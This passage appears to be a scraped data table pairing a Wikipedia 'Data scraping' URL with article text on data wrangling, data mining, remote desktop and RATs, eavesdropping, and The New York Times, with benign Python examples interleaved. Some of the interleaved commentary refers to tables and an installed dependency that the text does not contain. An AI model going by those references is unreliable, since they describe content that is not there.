consume the data directly in reports, or systems that will further process the data and write it into targets such as data warehouses, data lakes, or downstream applications. Depending on the amount and format of the incoming data, data wrangling has traditionally been performed manually (e.g. via spreadsheets such as Excel), with tools like KNIME, or via scripts in languages such as Python or SQL. R, a language often used in data mining and statistical data analysis, is now also sometimes used for data wrangling. 6 Data wranglers typically have skill sets in R or Python, SQL, PHP, Scala, and other languages typically used for analyzing data. Visual data wrangling systems were developed to make data wrangling accessible for non-programmers, and simpler for programmers. 
Some of these also include embedded AI recommenders and programming by example facilities to provide user assistance, and program synthesis techniques to autogenerate scalable dataflow code. Early prototypes of visual data wrangling tools include OpenRefine and the Stanford/Berkeley Wrangler research system; 7 the latter evolved into Trifacta. Other terms for these processes have included data franchising, 8 data preparation, and data munging. As a worked example, given a set of data that contains information on medical patients, suppose the goal is to find a correlation for a disease. Before you can start iterating through the data, ensure that you have an understanding of the desired result: are you looking for patients who have the disease? Are there other diseases that could be the cause? Once an understanding of the outcome is achieved, the data wrangling process can begin. Start by determining the structure of the outcome, that is, what is important for understanding the disease diagnosis. Once a final structure is determined, clean the data by removing any data points that are not helpful or are malformed; this could include patients who have not been diagnosed with any disease. After cleaning, look at the data again: is there anything already known that could be added to the data set to benefit it? An example could be the most common diseases in the area; America and India differ considerably in their most common diseases. Now comes the validation step: determine validation rules for which data points need to be checked for validity; this could include the date of birth or checking for specific diseases. After the validation step, the data should be organized and prepared for either deployment or evaluation. This process can be beneficial for determining correlations for disease diagnosis, as it reduces a vast amount of data into something that can be easily analyzed for an accurate result. |
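The two wrangling walkthroughs in the row above (the small contact-record clean-up and the medical-patient example) can be condensed into a short pandas sketch, using the pandas dependency this document already installs. Everything below is a hypothetical reconstruction: the column names, the sample records, and the state-abbreviation map are assumptions made for illustration rather than the article's actual tables, and the date handling relies on pandas 2.0 or newer for format="mixed".

import pandas as pd

# Hypothetical records resembling the example described above; the column names,
# values, and state map are illustrative assumptions, not the article's actual table.
raw = pd.DataFrame({
    "name":  ["SMITH, John", "Doe, jane", "Jacob Alan"],
    "phone": ["(555) 123-4567", "555.987.6543", "123-4567"],   # last entry lacks an area code
    "dob":   ["March 2, 1985", "07/04/1990", "June 1"],        # last entry lacks a year
    "state": ["TX", "ca", "NY"],
})

def wrangle(df: pd.DataFrame) -> pd.DataFrame:
    out = df.copy()
    # Names: turn "Last, First" into "First Last" and title-case the result
    parts = out["name"].str.split(",", n=1, expand=True)
    out["name"] = (parts[1].fillna("") + " " + parts[0]).str.strip().str.title()
    # Phones: keep digits only, require a full 10-digit number, then reformat
    digits = out["phone"].str.replace(r"\D", "", regex=True)
    out["phone"] = digits.where(digits.str.len() == 10).str.replace(
        r"(\d{3})(\d{3})(\d{4})", r"\1-\2-\3", regex=True)
    # Dates: entries without a four-digit year are treated as missing; the rest
    # are normalized to YYYY-mm-dd (format="mixed" needs pandas >= 2.0)
    dob = out["dob"].where(out["dob"].str.contains(r"\d{4}"))
    out["dob"] = pd.to_datetime(dob, format="mixed", errors="coerce").dt.strftime("%Y-%m-%d")
    # States: expand abbreviations using an assumed lookup table
    out["state"] = out["state"].str.upper().map({"TX": "Texas", "CA": "California", "NY": "New York"})
    # Validation: discard rows whose phone or birth date could not be repaired,
    # mirroring how the incomplete entry is dropped in the example above
    return out.dropna(subset=["phone", "dob"]).reset_index(drop=True)

print(wrangle(raw))

The same structure, clean, validate, and discard pattern is what the medical-patient example describes; only the validation rules (for instance, requiring a plausible birth date or a confirmed diagnosis) would change.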
363 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_mining | Data mining is the process of extracting and discovering patterns in large data sets involving methods at the intersection of machine learning, statistics, and database systems. 1 Data mining is an interdisciplinary subfield of computer science and statistics with an overall goal of extracting information (with intelligent methods) from a data set and transforming the information into a comprehensible structure for further use. 1 2 3 4 Data mining is the analysis step of the "knowledge discovery in databases" process, or KDD. 5 Aside from the raw analysis step, it also involves database and data management aspects, data pre-processing, model and inference considerations, interestingness metrics, complexity considerations, post-processing of discovered structures, visualization, and online updating. 1 The term "data mining" is a misnomer because the goal is the extraction of patterns and knowledge from large amounts of data, not the extraction (mining) of data itself. 6 It also is a buzzword 7 and is frequently applied to any form of large-scale data or information processing (collection, extraction, warehousing, analysis, and statistics) as well as any application of computer decision support system, including artificial intelligence (e.g., machine learning) and business intelligence. Often the more general terms (large scale) data analysis and analytics—or, when referring to actual methods, artificial intelligence and machine learning—are more appropriate. The actual data mining task is the semi-automatic or automatic analysis of large quantities of data to extract previously unknown, interesting patterns such as groups of data records (cluster analysis), unusual records (anomaly detection), and dependencies (association rule mining, sequential pattern mining). This usually involves using database techniques such as spatial indices. These patterns can then be seen as a kind of summary of the input data, and may be used in further analysis or, for example, in machine learning and predictive analytics. For example, the data mining step might identify multiple groups in the data, which can then be used to obtain more accurate prediction results by a decision support system. Neither the data collection, data preparation, nor result interpretation and reporting is part of the data mining step, although they do belong to the overall KDD process as additional steps. The difference between data analysis and data mining is that data analysis is used to test models and hypotheses on the dataset, e.g., analyzing the effectiveness of a marketing campaign, regardless of the amount of data. In contrast, data mining uses machine learning and statistical models to uncover clandestine or hidden patterns in a large volume of data. 8 The related terms data dredging, data fishing, and data snooping refer to the use of data mining methods to sample parts of a larger population data set that are (or may be) too small for reliable statistical inferences to be made about the validity of any patterns discovered. These methods can, however, be used in creating new hypotheses to test against the larger data populations. In the 1960s, statisticians and economists used terms like data fishing or data dredging to refer to what they considered the bad practice of analyzing data without an a-priori hypothesis. 
The term "data mining" was used in a similarly critical way by economist Michael Lovell in an article published in the Review of Economic Studies in 1983. 9 10 Lovell indicates that the practice "masquerades under a variety of aliases, ranging from "experimentation" (positive) to "fishing" or "snooping" (negative). The term data mining appeared around 1990 in the database community, with generally positive connotations. For a short time in 1980s, the phrase "database mining" , was used, but since it was trademarked by HNC, a San Diego-based company, to pitch their Database Mining Workstation; 11 researchers consequently turned to data mining. Other terms used include data archaeology, information harvesting, information discovery, knowledge extraction, etc. Gregory Piatetsky-Shapiro coined the term "knowledge discovery in databases" for the first workshop on the same topic (KDD 1989) and this term became more popular in the AI and machine learning communities. However, the term data mining became more popular in the business and press communities. 12 Currently, the terms data mining and knowledge discovery are used interchangeably. The manual extraction of patterns from data has occurred for centuries. Early methods of identifying patterns in data include Bayes' theorem (1700s) and regression analysis (1800s). 13 The proliferation, ubiquity and increasing power of computer technology have dramatically increased data collection, storage, and manipulation ability. As data sets have grown in size and complexity, direct "hands-on" data analysis has increasingly been augmented with indirect, automated data processing, aided by other discoveries in computer science, specially in the field of machine learning, such as neural networks, cluster analysis, genetic algorithms (1950s), decision trees and decision rules (1960s), and support vector machines (1990s). Data mining is the process of applying these methods with the intention of uncovering hidden patterns. 14 in large data sets. It bridges the gap from applied statistics and artificial intelligence (which usually provide the mathematical background) to database management by exploiting the way data is stored and indexed in databases to execute the actual learning and discovery algorithms more efficiently, allowing such methods to be applied to ever-larger data sets. The knowledge discovery in databases (KDD) process is commonly defined with the stages: It exists, however, in many variations on this theme, such as the Cross-industry standard process for data mining (CRISP-DM) which defines six phases: or a simplified process such as (1) Pre-processing, (2) Data Mining, and (3) Results Validation. Polls conducted in 2002, 2004, 2007 and 2014 show that the CRISP-DM methodology is the leading methodology used by data miners. 15 16 17 18 The only other data mining standard named in these polls was SEMMA. However, 3 4 times as many people reported using CRISP-DM. Several teams of researchers have published reviews of data mining process models, 19 and Azevedo and Santos conducted a comparison of CRISP-DM and SEMMA in 2008. 20 Before data mining algorithms can be used, a target data set must be assembled. As data mining can only uncover patterns actually present in the data, the target data set must be large enough to contain these patterns while remaining concise enough to be mined within an acceptable time limit. A common source for data is a data mart or data warehouse. 
Pre-processing is essential to analyze the multivariate data sets before data mining. The target set is then cleaned. Data cleaning removes the observations containing noise and those with missing data. Data mining involves six common classes of tasks: 5 Data mining can unintentionally be misused, producing results that appear to be significant but which do not actually predict future behavior and cannot be reproduced on a new sample of data, therefore bearing little use. This is sometimes caused by investigating too many hypotheses and not performing proper statistical hypothesis testing. A simple version of this problem in machine learning is known as overfitting, but the same problem can arise at different phases of the process and thus a train test split—when applicable at all—may not be sufficient to prevent this from happening. 21 The final step of knowledge discovery from data is to verify that the patterns produced by the data mining algorithms occur in the wider data set. Not all patterns found by the algorithms are necessarily valid. It is common for data mining algorithms to find patterns in the training set which are not present in the general data set. This is called overfitting. To overcome this, the evaluation uses a test set of data on which the data mining algorithm was not trained. The learned patterns are applied to this test set, and the resulting output is compared to the desired output. For example, a data mining algorithm trying to distinguish "spam" from "legitimate" e-mails would be trained on a training set of sample e-mails. Once trained, the learned patterns would be applied to the test set of e-mails on which it had not been trained. The accuracy of the patterns can then be measured from how many e-mails they correctly classify. Several statistical methods may be used to evaluate the algorithm, such as ROC curves. If the learned patterns do not meet the desired standards, it is necessary to re-evaluate and change the pre-processing and data mining steps. If the learned patterns do meet the desired standards, then the final step is to interpret the learned patterns and turn them into knowledge. The premier professional body in the field is the Association for Computing Machinery's (ACM) Special Interest Group (SIG) on Knowledge Discovery and Data Mining (SIGKDD). 22 23 Since 1989, this ACM SIG has hosted an annual international conference and published its proceedings, 24 and since 1999 it has published a biannual academic journal titled "SIGKDD Explorations". 25 Computer science conferences on data mining include: Data mining topics are also present in many data management database conferences such as the ICDE Conference, SIGMOD Conference and International Conference on Very Large Data Bases. There have been some efforts to define standards for the data mining process, for example, the 1999 European Cross Industry Standard Process for Data Mining (CRISP-DM 1.0) and the 2004 Java Data Mining standard (JDM 1.0). Development on successors to these processes (CRISP-DM 2.0 and JDM 2.0) was active in 2006 but has stalled since. JDM 2.0 was withdrawn without reaching a final draft. For exchanging the extracted models—in particular for use in predictive analytics—the key standard is the Predictive Model Markup Language (PMML), which is an XML-based language developed by the Data Mining Group (DMG) and supported as exchange format by many data mining applications. 
As the name suggests, it only covers prediction models, a particular data mining task of high importance to business applications. However, extensions to cover (for example) subspace clustering have been proposed independently of the DMG. 26 Data mining is used wherever there is digital data available. Notable examples of data mining can be found throughout business, medicine, science, finance, construction, and surveillance. While the term "data mining" itself may have no ethical implications, it is often associated with the mining of information in relation to user behavior (ethical and otherwise). 27 The ways in which data mining can be used can in some cases and contexts raise questions regarding privacy, legality, and ethics. 28 In particular, data mining government or commercial data sets for national security or law enforcement purposes, such as in the Total Information Awareness Program or in ADVISE, has raised privacy concerns. 29 30 Data mining requires data preparation which uncovers information or patterns which compromise confidentiality and privacy obligations. A common way for this to occur is through data aggregation. Data aggregation involves combining data together (possibly from various sources) in a way that facilitates analysis (but that also might make identification of private, individual-level data deducible or otherwise apparent). 31 This is not data mining per se, but a result of the preparation of data before—and for the purposes of—the analysis. The threat to an individual's privacy comes into play when the data, once compiled, cause the data miner, or anyone who has access to the newly compiled data set, to be able to identify specific individuals, especially when the data were originally anonymous. 32 It is recommended according to whom? to be aware of the following before data are collected: 31 Data may also be modified so as to become anonymous, so that individuals may not readily be identified. 31 However, even "anonymized" data sets can potentially contain enough information to allow identification of individuals, as occurred when journalists were able to find several individuals based on a set of search histories that were inadvertently released by AOL. 33 The inadvertent revelation of personally identifiable information leading to the provider violates Fair Information Practices. This indiscretion can cause financial, emotional, or bodily harm to the indicated individual. In one instance of privacy violation, the patrons of Walgreens filed a lawsuit against the company in 2011 for selling prescription information to data mining companies who in turn provided the data to pharmaceutical companies. 34 Europe has rather strong privacy laws, and efforts are underway to further strengthen the rights of the consumers. However, the U.S. E.U. Safe Harbor Principles, developed between 1998 and 2000, currently effectively expose European users to privacy exploitation by U.S. companies. As a consequence of Edward Snowden's global surveillance disclosure, there has been increased discussion to revoke this agreement, as in particular the data will be fully exposed to the National Security Agency, and attempts to reach an agreement with the United States have failed. 35 In the United Kingdom in particular there have been cases of corporations using data mining as a way to target certain groups of customers forcing them to pay unfairly high prices. 
These groups tend to be people of lower socio-economic status who are not savvy to the ways they can be exploited in digital marketplaces. 36 In the United States, privacy concerns have been addressed by the US Congress via the passage of regulatory controls such as the Health Insurance Portability and Accountability Act (HIPAA). HIPAA requires individuals to give their "informed consent" regarding information they provide and its intended present and future uses. According to an article in Biotech Business Week, "[i]n practice, HIPAA may not offer any greater protection than the longstanding regulations in the research arena," says the AAHC. More importantly, the rule's goal of protection through informed consent is approaching a level of incomprehensibility to average individuals. 37 This underscores the necessity for data anonymity in data aggregation and mining practices. U.S. information privacy legislation such as HIPAA and the Family Educational Rights and Privacy Act (FERPA) applies only to the specific areas that each such law addresses. The use of data mining by the majority of businesses in the U.S. is not controlled by any legislation. Under European copyright and database laws, the mining of in-copyright works (such as by web mining) without the permission of the copyright owner is not legal. Where a database is pure data in Europe, it may be that there is no copyright—but database rights may exist, so data mining becomes subject to intellectual property owners' rights that are protected by the Database Directive. On the recommendation of the Hargreaves review, the UK government amended its copyright law in 2014 to allow content mining as a limitation and exception. 38 The UK was the second country in the world to do so after Japan, which introduced an exception in 2009 for data mining. However, due to the restriction of the Information Society Directive (2001), the UK exception only allows content mining for non-commercial purposes. UK copyright law also does not allow this provision to be overridden by contractual terms and conditions. Since 2020, Switzerland has also been regulating data mining by allowing it in the research field under certain conditions laid down by art. 24d of the Swiss Copyright Act. This new article entered into force on 1 April 2020. 39 The European Commission facilitated stakeholder discussion on text and data mining in 2013, under the title of Licences for Europe. 40 The focus on the solution to this legal issue, such as licensing rather than limitations and exceptions, led representatives of universities, researchers, libraries, civil society groups and open access publishers to leave the stakeholder dialogue in May 2013. 41 US copyright law, and in particular its provision for fair use, upholds the legality of content mining in America, and other fair use countries such as Israel, Taiwan and South Korea. As content mining is transformative, that is, it does not supplant the original work, it is viewed as being lawful under fair use. For example, as part of the Google Book settlement the presiding judge on the case ruled that Google's digitization project of in-copyright books was lawful, in part because of the transformative uses that the digitization project displayed—one being text and data mining. 42 The following applications are available under free and open-source licenses. Public access to application source code is also available. The following applications are available under proprietary licenses. 
For more information about extracting information out of data (as opposed to analyzing data), see: |
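Two parts of the data mining row above lend themselves to small code sketches: the pattern-discovery tasks (cluster analysis and anomaly detection) and the held-out evaluation of a spam filter measured with accuracy and an ROC-based score. Both sketches are illustrative assumptions: they use scikit-learn and tiny invented data sets as stand-ins, not the article's methods. First, clustering and anomaly detection on synthetic records:

import numpy as np
from sklearn.cluster import KMeans
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
# Two well-separated groups of synthetic records plus one unusual record
data = np.vstack([
    rng.normal(loc=[0.0, 0.0], scale=0.5, size=(100, 2)),
    rng.normal(loc=[5.0, 5.0], scale=0.5, size=(100, 2)),
    [[10.0, -10.0]],
])

# Cluster analysis: group similar records together
clusters = KMeans(n_clusters=2, n_init=10, random_state=0).fit_predict(data)
# Anomaly detection: -1 marks records flagged as outliers
outliers = IsolationForest(contamination=0.01, random_state=0).fit_predict(data)

print("cluster sizes:", np.bincount(clusters))
print("records flagged as anomalous:", int((outliers == -1).sum()))

Second, the train and test evaluation loop described above for separating "spam" from "legitimate" e-mail; holding out a test set is what guards against mistaking overfit training-set patterns for real ones:

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics import accuracy_score, roc_auc_score
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB

# Tiny invented corpus: 1 = spam, 0 = legitimate
emails = [
    "win a free prize now", "cheap meds limited offer", "claim your reward today",
    "free cash click here", "meeting moved to 3pm", "quarterly report attached",
    "lunch tomorrow at noon", "project deadline next week",
]
labels = [1, 1, 1, 1, 0, 0, 0, 0]

# Hold out a test set the model never sees during training
train_txt, test_txt, y_train, y_test = train_test_split(
    emails, labels, test_size=0.5, random_state=0, stratify=labels)

# Learn patterns (word counts + naive Bayes) from the training e-mails only
vectorizer = CountVectorizer()
model = MultinomialNB().fit(vectorizer.fit_transform(train_txt), y_train)

# Apply the learned patterns to the unseen test e-mails and measure the result
X_test = vectorizer.transform(test_txt)
pred = model.predict(X_test)
spam_scores = model.predict_proba(X_test)[:, 1]

print("accuracy:", accuracy_score(y_test, pred))          # fraction classified correctly
print("ROC AUC :", roc_auc_score(y_test, spam_scores))    # threshold-free ranking quality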
364 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Remote_access_trojan | In computing, the term remote desktop refers to a software- or operating system feature that allows a personal computer's desktop environment to be run remotely from one system (usually a PC, but the concept applies equally to a server or a smartphone), while being displayed on a separate client device. Remote desktop applications have varying features. Some allow attaching to an existing user's session and "remote controlling", either displaying the remote control session or blanking the screen. Taking over a desktop remotely is a form of remote administration. Remote access can also be explained as the remote control of a computer by using another device connected via the internet or another network. This is widely used by many computer manufacturers and large businesses help desks for technical troubleshooting of their customer's problems. Remote desktop software captures the mouse and keyboard inputs from the local computer (client) and sends them to the remote computer (server). 1 The remote computer in turn sends the display commands to the local computer. When applications with many graphics including video or 3D models need to be controlled remotely, a remote workstation software that sends the pixels rather than the display commands must be used to provide a smooth, like-local experience. Remote desktop sharing is accomplished through a common client server model. The client, or VNC viewer, is installed on a local computer and then connects via a network to a server component, which is installed on the remote computer. In a typical VNC session, all keystrokes and mouse clicks are registered as if the client were actually performing tasks on the end-user machine. 2 Remote desktops also have a major advantage for security development, companies are able to permit software engineers who may be dispersed geographically to operate and develop from a computer which can be held within the companies office or cloud environment. The target computer in a remote desktop scenario is still able to access all of its core functions. Many of these core functions, including the main clipboard, can be shared between the target computer and remote desktop client. Since the onset of COVID 19, the shift to remote-work environments has led many to work from home with devices without enterprise IT support. As a result, these workers are reliant on remote desktop software to collaborate and keep their systems available and secure. 3 A main use of remote desktop software is remote administration and remote implementation. This need arises when software buyers are far away from their software vendor. Most remote access software can be used for "headless computers": instead of each computer having its own monitor, keyboard, and mouse, or using a KVM switch, one computer can have a monitor, keyboard, mouse, and remote control software, and control many headless computers. The duplicate desktop mode is useful for user support and education. Remote control software combined with telephone communication can be nearly as helpful for novice computer-users as if the support staff were actually there. Remote desktop software can be used to access a remote computer: a physical personal computer to which a user does not have physical access, but that can be accessed or interacted with. 4 Unlike servers, remote computers are mainly used for peer to peer connections, where one device is unattended. 
A remote computer connection is generally only possible if both devices have a network connection. Since the advent of cloud computing remote desktop software can be housed on USB hardware devices, allowing users to connect the device to any PC connected to their network or the Internet and recreate their desktop via a connection to the cloud. This model avoids one problem with remote desktop software, which requires the local computer to be switched on at the time when the user wishes to access it remotely. (It is possible with a router with C2S VPN support, and wake on LAN equipment, to establish a virtual private network (VPN) connection with the router over the Internet if not connected to the LAN, switch on a computer connected to the router, then connect to it.) Remote desktop products are available in three models: hosted service, software, and appliance. Tech support scammers use remote desktop software to connect to their victim's computer and will often lock out the computer if the victim does not cooperate. Remote desktop protocols include the following: A remote access trojan (RAT, sometimes called creepware) 6 is a type of malware that controls a system through a remote network connection. While desktop sharing and remote administration have many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from computer security software and other anti-virus software. 7 8 9 10 11 12 |
365 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Eavesdropping | Eavesdropping is the act of secretly or stealthily listening to the private conversation or communications of others without their consent in order to gather information. The verb eavesdrop is a back-formation from the noun eavesdropper ("a person who eavesdrops"), which was formed from the related noun eavesdrop ("the dripping of water from the eaves of a house; the ground on which such water falls"). 1 An eavesdropper was someone who would hang from the eave of a building so as to hear what is said within. The PBS documentaries Inside the Court of Henry VIII (April 8, 2015) 2 and Secrets of Henry VIII’s Palace (June 30, 2013) include segments that display and discuss "eavedrops", carved wooden figures Henry VIII had built into the eaves (overhanging edges of the beams in the ceiling) of Hampton Court to discourage unwanted gossip or dissension from the King's wishes and rule, to foment paranoia and fear, 2 and demonstrate that everything said there was being overheard; literally, that the walls had ears. 3 Eavesdropping vectors include telephone lines, cellular networks, email, and other methods of private instant messaging. Devices that support VoIP and other communication software are also vulnerable to electronic eavesdropping by computer viruses categorized as trojan viruses or more broadly as spyware. 4 Network eavesdropping is a network layer attack that focuses on capturing small packets from the network transmitted by other computers and reading the data content in search of any type of information. 5 This type of network attack is generally one of the most effective as a lack of encryption services are used and when the connection between the two endpoints are weak and not secure. 6 7 It is also linked to the collection of metadata. There is a growing importance of security in communication systems, specifically in wireless technology. The need for security measures at different levels, including software encryption, hardware protection (e.g., trusted platform modules), and even the physical layer using wave-front engineering is as crucial than ever. 8 Researchers have expressed the importance of addressing the privacy concerns from eavesdropping attacks because they impact the rights of users and the ability to have confidence in the devices as well as the entire Internet. Ensuring that users have trust and confidence in their Internet activities so users continue to engage actively in the system and share data. 9 |
366 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/The_New_York_Times | The New York Times (NYT) b is an American daily newspaper based in New York City. The New York Times covers domestic, national, and international news, and publishes opinion pieces, investigative reports, and reviews. As one of the longest-running newspapers in the United States, the Times serves as one of the country's newspapers of record. As of August 2024 update , The New York Times is the second-largest newspaper by print circulation in the United States, with 600,000 print subscribers. Including online subscribers, the Times has a circulation of 10.8 million, the most of any newspaper in the U.S. The New York Times is published by The New York Times Company; since 1896, the company has been chaired by the Ochs-Sulzberger family, whose current chairman and the paper's publisher is A. G. Sulzberger. The Times is headquartered at The New York Times Building in Midtown Manhattan. The Times was founded as the conservative New-York Daily Times in 1851, and came to national recognition in the 1870s with its aggressive coverage of corrupt politician William M. Tweed. Following the Panic of 1893, Chattanooga Times publisher Adolph Ochs gained a controlling interest in the company. In 1935, Ochs was succeeded by his son-in-law, Arthur Hays Sulzberger, who began a push into European news. Sulzberger's son-in-law Arthur Ochs became publisher in 1963, adapting to a changing newspaper industry and introducing radical changes. The New York Times was involved in the landmark 1964 U.S. Supreme Court case New York Times Co. v. Sullivan, which restricted the ability of public officials to sue the media for defamation. In 1971, The New York Times published the Pentagon Papers, an internal Department of Defense document detailing the United States's historical involvement in the Vietnam War, despite pushback from then-president Richard Nixon. In the landmark decision New York Times Co. v. United States (1971), the Supreme Court ruled that the First Amendment guaranteed the right to publish the Pentagon Papers. In the 1980s, the Times began a two-decade progression to digital technology and launched nytimes.com in 1996. In the 21st century, The New York Times has shifted its publication online amid the global decline of newspapers. The Times has expanded to several other publications, including The New York Times Magazine, The New York Times International Edition, and The New York Times Book Review. In addition, the paper has produced several television series, podcasts — including The Daily — and games through The New York Times Games. The New York Times has been involved in several controversies in its history. The Times maintains several regional bureaus staffed with journalists across six continents. The New York Times has received 137 Pulitzer Prizes as of 2023, the most of any publication, among other accolades. The New York Times was established in 1851 by New-York Tribune journalists Henry Jarvis Raymond and George Jones. 4 The Times experienced significant circulation, particularly among conservatives; New-York Tribune publisher Horace Greeley praised the New-York Daily Times. 5 During the American Civil War, Times correspondents gathered information directly from Confederate states. 6 In 1869, Jones inherited the paper from Raymond, 7 who had changed its name to The New-York Times. 8 Under Jones, the Times began to publish a series of articles criticizing Tammany Hall political boss William M. 
Tweed, despite vehement opposition from other New York newspapers. 9 In 1871, The New-York Times published Tammany Hall's accounting books; Tweed was tried in 1873 and sentenced to twelve years in prison. The Times earned national recognition for its coverage of Tweed. 10 In 1891, Jones died, creating a management imbroglio in which his children had insufficient business acumen to inherit the company and his will prevented an acquisition of the Times. 11 Editor-in-chief Charles Ransom Miller, editorial editor Edward Cary, and correspondent George F. Spinney established a company to manage The New-York Times, 12 but faced financial difficulties during the Panic of 1893. 13 In August 1896, Chattanooga Times publisher Adolph Ochs acquired The New-York Times, implementing significant alterations to the newspaper's structure. Ochs established the Times as a merchant's newspaper and removed the hyphen from the newspaper's name. 14 In 1905, The New York Times opened Times Tower, marking expansion. 15 The Times experienced a political realignment in the 1910s amid several disagreements within the Republican Party. 16 The New York Times reported on the sinking of the Titanic, as other newspapers were cautious about bulletins circulated by the Associated Press. 17 Through managing editor Carr Van Anda, the Times focused on scientific advancements, reporting on Albert Einstein's then-unknown theory of general relativity and becoming involved in the discovery of the tomb of Tutankhamun. 18 In April 1935, Ochs died, leaving his son-in-law Arthur Hays Sulzberger as publisher. 19 The Great Depression forced Sulzberger to reduce The New York Times's operations, 20 and developments in the New York newspaper landscape resulted in the formation of larger newspapers, such as the New York Herald Tribune and the New York World-Telegram. 21 In contrast to Ochs, Sulzberger encouraged wirephotography. 22 The New York Times extensively covered World War II through large headlines, 23 reporting on exclusive stories such as the Yugoslav coup d' tat. 24 Amid the war, Sulzberger began expanding the Times's operations further, acquiring WQXR-FM in 1944 — the first non-Times investment since the Jones era — and established a fashion show in Times Hall. Despite reductions as a result of conscription, The New York Times retained the largest journalism staff of any newspaper. 25 The Times's print edition became available internationally during the war through the Army Air Force Exchange Service; The New York Times Overseas Weekly later became available in Japan through The Asahi Shimbun and in Germany through the Frankfurter Zeitung. The international edition would develop into a separate newspaper. 26 Journalist William L. Laurence publicized the atomic bomb race between the United States and Germany, resulting in the Federal Bureau of Investigation seizing copies of the Times. The United States government recruited Laurence to document the Manhattan Project in April 1945. 27 Laurence became the only witness of the Manhattan Project, a detail realized by employees of The New York Times following the atomic bombing of Hiroshima. 28 Following World War II, The New York Times continued to expand. 29 The Times was subject to investigations from the Senate Internal Security Subcommittee, a McCarthyist subcommittee that investigated purported communism from within press institutions. 
Arthur Hays Sulzberger's decision to dismiss a copyreader who had pleaded the Fifth Amendment drew ire from within the Times and from external organizations. 30 In April 1961, Sulzberger resigned, appointing his son-in-law, The New York Times Company president Orvil Dryfoos. 31 Under Dryfoos, The New York Times established a newspaper based in Los Angeles. 32 In 1962, the implementation of automated printing presses in response to increasing costs mounted fears over technological unemployment. The New York Typographical Union staged a strike in December, altering the media consumption of New Yorkers. The strike left New York with three remaining newspapers — the Times, the Daily News, and the New York Post — by its conclusion in March 1963. 33 In May, Dryfoos died of a heart ailment. 34 Following weeks of ambiguity, Arthur Ochs Sulzberger became The New York Times's publisher. 35 Technological advancements leveraged by newspapers such as the Los Angeles Times and improvements in coverage from The Washington Post and The Wall Street Journal necessitated adaptations to nascent computing. 36 The New York Times published "Heed Their Rising Voices" in 1960, a full-page advertisement purchased by supporters of Martin Luther King Jr. criticizing law enforcement in Montgomery, Alabama for their response to the civil rights movement. Montgomery Public Safety commissioner L. B. Sullivan sued the Times for defamation. In New York Times Co. v. Sullivan (1964), the U.S. Supreme Court ruled that the verdict in Alabama county court and the Supreme Court of Alabama violated the First Amendment. 37 The decision is considered to be landmark. 38 After financial losses, The New York Times ended its international edition, acquiring a stake in the Paris Herald Tribune, forming the International Herald Tribune. 39 The Times initially published the Pentagon Papers, facing opposition from then-president Richard Nixon. The Supreme Court ruled in The New York Times's favor in New York Times Co. v. United States (1971), allowing the Times and The Washington Post to publish the papers. 40 The New York Times remained cautious in its initial coverage of the Watergate scandal. 41 As Congress began investigating the scandal, the Times furthered its coverage, 42 publishing details on the Huston Plan, alleged wiretapping of reporters and officials, 43 and testimony from James W. McCord Jr. that the Committee for the Re-Election of the President paid the conspirators off. 44 The exodus of readers to suburban New York newspapers, such as Newsday and Gannett papers, adversely affected The New York Times's circulation. 45 Contemporary newspapers balked at additional sections; Time devoted a cover for its criticism and New York wrote that the Times was engaging in "middle-class self-absorption". 46 The New York Times, the Daily News, and the New York Post were the subject of a strike in 1978, 47 allowing emerging newspapers to leverage halted coverage. 48 The Times deliberately avoided coverage of the AIDS epidemic, running its first front-page article in May 1983. Max Frankel's editorial coverage of the epidemic, with mentions of anal intercourse, contrasted with then-executive editor A. M. Rosenthal's puritan approach, intentionally avoiding descriptions of the luridity of gay venues. 49 Following years of waning interest in The New York Times, Sulzberger resigned in January 1992, appointing his son, Arthur Ochs Sulzberger Jr., as publisher. 
50 The Internet represented a generational shift within the Times; Sulzberger, who negotiated The New York Times Company's acquisition of The Boston Globe in 1993, derided the Internet, while his son expressed antithetical views. times appeared on America Online's website in May 1994 as an extension of The New York Times, featuring news articles, film reviews, sports news, and business articles. 51 Despite opposition, several employees of the Times had begun to access the Internet. 52 The online success of publications that traditionally co-existed with the Times — such as America Online, Yahoo, and CNN — and the expansion of websites such as Monster.com and Craigslist that threatened The New York Times's classified advertisement model increased efforts to develop a website. 53 nytimes.com debuted on January 19 and was formally announced three days later. 54 The Times published domestic terrorist Ted Kaczynski's essay Industrial Society and Its Future in 1995, contributing to his arrest after his brother David recognized the essay's penmanship. 55 Following the establishment of nytimes.com, The New York Times retained its journalistic hesitancy under executive editor Joseph Lelyveld, refusing to publish an article reporting on the Clinton Lewinsky scandal from Drudge Report. nytimes.com editors conflicted with print editors on several occasions, including wrongfully naming security guard Richard Jewell as the suspect in the Centennial Olympic Park bombing and covering the death of Diana, Princess of Wales in greater detail than the print edition. 56 The New York Times Electronic Media Company was adversely affected by the dot-com crash. 57 The Times extensively covered the September 11 attacks. The following day's print issue contained sixty-six articles, 58 the work of over three hundred dispatched reporters. 59 Journalist Judith Miller was the recipient of a package containing a white powder during the 2001 anthrax attacks, furthering anxiety within The New York Times. 60 In September 2002, Miller and military correspondent Michael R. Gordon wrote an article for the Times claiming that Iraq had purchased aluminum tubes. The article was cited by then-president George W. Bush to claim that Iraq was constructing weapons of mass destruction; the theoretical use of aluminum tubes to produce nuclear material was speculation. 61 In March 2003, the United States invaded Iraq, beginning the Iraq War. 62 The New York Times attracted controversy after thirty-six articles 63 from journalist Jayson Blair were discovered to be plagiarized. 64 Criticism over then-executive editor Howell Raines and then-managing editor Gerald M. Boyd mounted following the scandal, culminating in a town hall in which a deputy editor criticized Raines for failing to question Blair's sources in article he wrote on the D.C. sniper attacks. 65 In June 2003, Raines and Boyd resigned. 66 Arthur Ochs Sulzberger Jr. appointed Bill Keller as executive editor. 67 Miller continued to report on the Iraq War as a journalistic embed covering the country's weapons of mass destruction program. Keller and then-Washington bureau chief Jill Abramson unsuccessfully attempted to subside criticism. Conservative media criticized the Times over its coverage of missing explosives from the Al Qa'qaa weapons facility. 68 An article in December 2005 disclosing warrantless surveillance by the National Security Agency contributed 